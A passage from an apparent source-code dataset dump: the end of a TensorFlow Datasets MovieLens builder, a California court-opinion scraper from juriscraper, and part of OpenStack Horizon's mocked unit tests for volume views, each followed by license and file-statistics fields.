'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='latest-small-movies',
description=textwrap.dedent("""\
This dataset contains data of 9,742 movies rated in the
latest-small dataset."""),
version='0.1.0',
format_version='latest-small',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
MovieLensConfig(
name='100k-ratings',
description=textwrap.dedent("""\
This dataset contains 100,000 ratings from 943 users on 1,682
movies. This dataset is the oldest version of the MovieLens
dataset.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. This dataset contains demographic data of users in
addition to data on movies and ratings."""),
version='0.1.0',
format_version='100k',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_ratings_data,
),
MovieLensConfig(
name='100k-movies',
description=textwrap.dedent("""\
This dataset contains data of 1,682 movies rated in the 100k
dataset."""),
version='0.1.0',
format_version='100k',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_movies_data,
),
MovieLensConfig(
name='1m-ratings',
description=textwrap.dedent("""\
This dataset contains 1,000,209 anonymous ratings of approximately
3,900 movies made by 6,040 MovieLens users who joined MovieLens in
2000. This dataset is the largest dataset that includes
demographic data.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. In demographic data, age values are divided into
ranges and the lowest age value for each range is used in the data
instead of the actual values."""),
version='0.1.0',
format_version='1m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_ratings_data,
),
MovieLensConfig(
name='1m-movies',
description=textwrap.dedent("""\
This dataset contains data of approximately 3,900 movies rated in
the 1m dataset."""),
version='0.1.0',
format_version='1m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_movies_data,
),
MovieLensConfig(
name='20m-ratings',
description=textwrap.dedent("""\
This dataset contains 20,000,263 ratings across 27,278
movies, created by 138,493 users between January 09, 1995 and
March 31, 2015. This dataset was generated on October 17, 2016.
Each user has rated at least 20 movies. Ratings are in half-star
increments. This dataset does not contain demographic data."""),
version='0.1.0',
format_version='20m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='20m-movies',
description=textwrap.dedent("""\
This dataset contains data of 27,278 movies rated in the 20m
dataset"""),
version='0.1.0',
format_version='20m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
]
VERSION = tfds.core.Version('0.1.0')
def _info(self) -> tfds.core.DatasetInfo:
"""Returns DatasetInfo according to self.builder_config."""
movie_features_dict = {
'movie_id':
tf.string,
'movie_title':
tf.string,
'movie_genres':
tfds.features.Sequence(
tfds.features.ClassLabel(names=[
'Action',
'Adventure',
'Animation',
'Children',
'Comedy',
'Crime',
'Documentary',
'Drama',
'Fantasy',
'Film-Noir',
'Horror',
'IMAX',
'Musical',
'Mystery',
'Romance',
'Sci-Fi',
'Thriller',
'Unknown',
'War',
'Western',
'(no genres listed)',
]),),
}
rating_features_dict = {
'user_id': tf.string,
'user_rating': tf.float32,
# Using int64 since tfds currently does not support float64.
'timestamp': tf.int64,
}
demographic_features_dict = {
'user_gender':
tf.bool,
'bucketized_user_age':
tf.float32,
'user_occupation_label':
tfds.features.ClassLabel(names=[
'academic/educator',
'artist',
'clerical/admin',
'customer service',
'doctor/health care',
'entertainment',
'executive/managerial',
'farmer',
'homemaker',
'lawyer',
'librarian',
'other/not specified',
'programmer',
'retired',
'sales/marketing',
'scientist',
'self-employed',
'student',
'technician/engineer',
'tradesman/craftsman',
'unemployed',
'writer',
]),
'user_occupation_text':
tf.string,
'user_zip_code':
tf.string,
}
features_dict = {}
if self.builder_config.table_option == 'movies':
features_dict.update(movie_features_dict)
# For the other cases, self.builder_config.table_option == 'ratings'.
# Older versions of MovieLens (1m, 100k) have demographic features.
elif self.builder_config.format_version == '1m':
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
elif self.builder_config.format_version == '100k':
# Only the 100k dataset contains exact user ages. The 1m dataset
# contains only bucketized age values.
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
features_dict.update(raw_user_age=tf.float32)
else:
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict(features_dict),
supervised_keys=None,
homepage='https://grouplens.org/datasets/movielens/',
citation=_CITATION,
)
def _split_generators(
self, dl_manager: tfds.download.DownloadManager
) -> List[tfds.core.SplitGenerator]:
"""Returns SplitGenerators."""
extracted_path = dl_manager.download_and_extract(
self.builder_config.download_url,)
dir_path = os.path.join(
extracted_path,
'ml-%s' % self.builder_config.format_version,
)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={'dir_path': dir_path},
),
]
def _generate_examples(
self,
dir_path: Optional[str] = None) -> Iterator[Tuple[int, Dict[str, Any]]]:
"""Yields examples by calling the corresponding parsing function."""
for ex in self.builder_config.parsing_fn(dir_path):
yield ex
class MovieLens(Movielens):
"""MovieLens rating dataset (deprecated handle version)."""
def __init__(self, **kwargs):
logging.warning(
'The handle "movie_lens" for the MovieLens dataset is deprecated. '
'Prefer using "movielens" instead.')
super(MovieLens, self).__init__(**kwargs)
|
apache-2.0
| 1,772,383,642,943,722,500
| 37.592672
| 80
| 0.612833
| false
| 3.964357
| true
| false
| false
|
brianwc/juriscraper
|
opinions/united_states/state/cal.py
|
1
|
1498
|
from juriscraper.OpinionSite import OpinionSite
import re
import time
from datetime import date
class Site(OpinionSite):
def __init__(self):
super(Site, self).__init__()
self.url = 'http://www.courtinfo.ca.gov/cgi-bin/opinions-blank.cgi?Courts=S'
self.court_id = self.__module__
def _get_case_names(self):
case_names = []
for name in self.html.xpath('//table/tr/td[3]/text()'):
date_regex = re.compile(r' \d\d?\/\d\d?\/\d\d| filed')
if 'P. v. ' in date_regex.split(name)[0]:
case_names.append(date_regex.split(name)[0].replace("P. ", "People "))
else:
case_names.append(date_regex.split(name)[0])
return case_names
def _get_download_urls(self):
return [t for t in self.html.xpath("//table/tr/td[2]/a/@href[contains(.,'PDF')]")]
def _get_case_dates(self):
dates = []
for s in self.html.xpath('//table/tr/td[1]/text()'):
s = s.strip()
date_formats = ['%b %d %Y', '%b %d, %Y']
for format in date_formats:
try:
dates.append(date.fromtimestamp(time.mktime(time.strptime(s, format))))
except ValueError:
pass
return dates
def _get_docket_numbers(self):
return [t for t in self.html.xpath('//table/tr/td[2]/text()[1]')]
def _get_precedential_statuses(self):
return ['Published'] * len(self.case_names)
|
bsd-2-clause
| 7,258,131,139,515,015,000
| 34.666667
| 91
| 0.548732
| false
| 3.314159
| false
| false
| false
|
openstack/horizon
|
openstack_dashboard/dashboards/project/volumes/tests.py
|
1
|
96001
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from django.conf import settings
from django.forms import widgets
from django.template.defaultfilters import slugify
from django.test.utils import override_settings
from django.urls import reverse
from django.utils.http import urlunquote
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
import tables as volume_tables
from openstack_dashboard.dashboards.project.volumes import tabs
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
DETAIL_URL = ('horizon:project:volumes:detail')
INDEX_URL = reverse('horizon:project:volumes:index')
SEARCH_OPTS = dict(status=api.cinder.VOLUME_STATE_AVAILABLE)
ATTACHMENT_ID = '6061364b-6612-48a9-8fee-1a38fe072547'
class VolumeIndexViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
api.cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits',
'group_list'],
})
def _test_index(self, with_attachments=False, with_groups=False):
vol_snaps = self.cinder_volume_snapshots.list()
volumes = self.cinder_volumes.list()
if with_attachments:
server = self.servers.first()
else:
for volume in volumes:
volume.attachments = []
self.mock_volume_backup_supported.return_value = False
if with_groups:
self.mock_group_list.return_value = self.cinder_groups.list()
volumes = self.cinder_group_volumes.list()
self.mock_volume_list_paged.return_value = [volumes, False, False]
if with_attachments:
self.mock_server_get.return_value = server
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(INDEX_URL)
if with_attachments:
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_snapshot_list.assert_called_once()
if with_groups:
self.mock_group_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_backup_supported.assert_called_with(
test.IsHttpRequest())
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None, search_opts=None,
sort_dir='desc', paginate=True)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
def test_index_with_volume_attachments(self):
self._test_index(True)
def test_index_no_volume_attachments(self):
self._test_index(False)
def test_index_with_volume_groups(self):
self._test_index(with_groups=True)
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
cinder: ['tenant_absolute_limits',
'volume_list_paged',
'volume_backup_supported',
'volume_snapshot_list'],
})
def _test_index_paginated(self, marker, sort_dir, volumes, url,
has_more, has_prev):
backup_supported = True
vol_snaps = self.cinder_volume_snapshots.list()
server = self.servers.first()
self.mock_volume_backup_supported.return_value = backup_supported
self.mock_volume_list_paged.return_value = [volumes,
has_more, has_prev]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(urlunquote(url))
self.assertEqual(2, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=marker, sort_dir=sort_dir,
search_opts=None, paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
return res
def ensure_attachments_exist(self, volumes):
volumes = copy.copy(volumes)
for volume in volumes:
if not volume.attachments:
volume.attachments.append({
"id": "1", "server_id": '1', "device": "/dev/hda",
"attachment_id": ATTACHMENT_ID})
return volumes
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# get first page
expected_volumes = volumes[:size]
url = INDEX_URL
res = self._test_index_paginated(None, "desc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get second page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get last page
expected_volumes = volumes[-size:]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
False, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated_prev_page(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# prev from some page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# back to first page
expected_volumes = volumes[:size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
class VolumeViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
def tearDown(self):
for volume in self.cinder_volumes.list():
# VolumeTableMixIn._set_volume_attributes mutates data
# and cinder_volumes.list() doesn't deep copy
for att in volume.attachments:
if 'instance' in att:
del att['instance']
super().tearDown()
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_without_name(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': '',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
cinder: ['volume_type_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'volume_snapshot_list',
'volume_snapshot_get',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A copy of a volume',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
redirect_url = INDEX_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], None, metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=volume.id)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['volume_snapshot_get',
'volume_type_list',
'volume_type_default',
'volume_get',
'group_list'],
})
def test_create_volume_from_snapshot_invalid_size(self):
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.mock_volume_snapshot_get.assert_called_with(test.IsHttpRequest(),
str(snapshot.id))
self.mock_volume_get.assert_called_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_default',
'volume_type_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.ret = self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_once_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed',
'image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_snapshot_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_create',
'group_list'],
})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
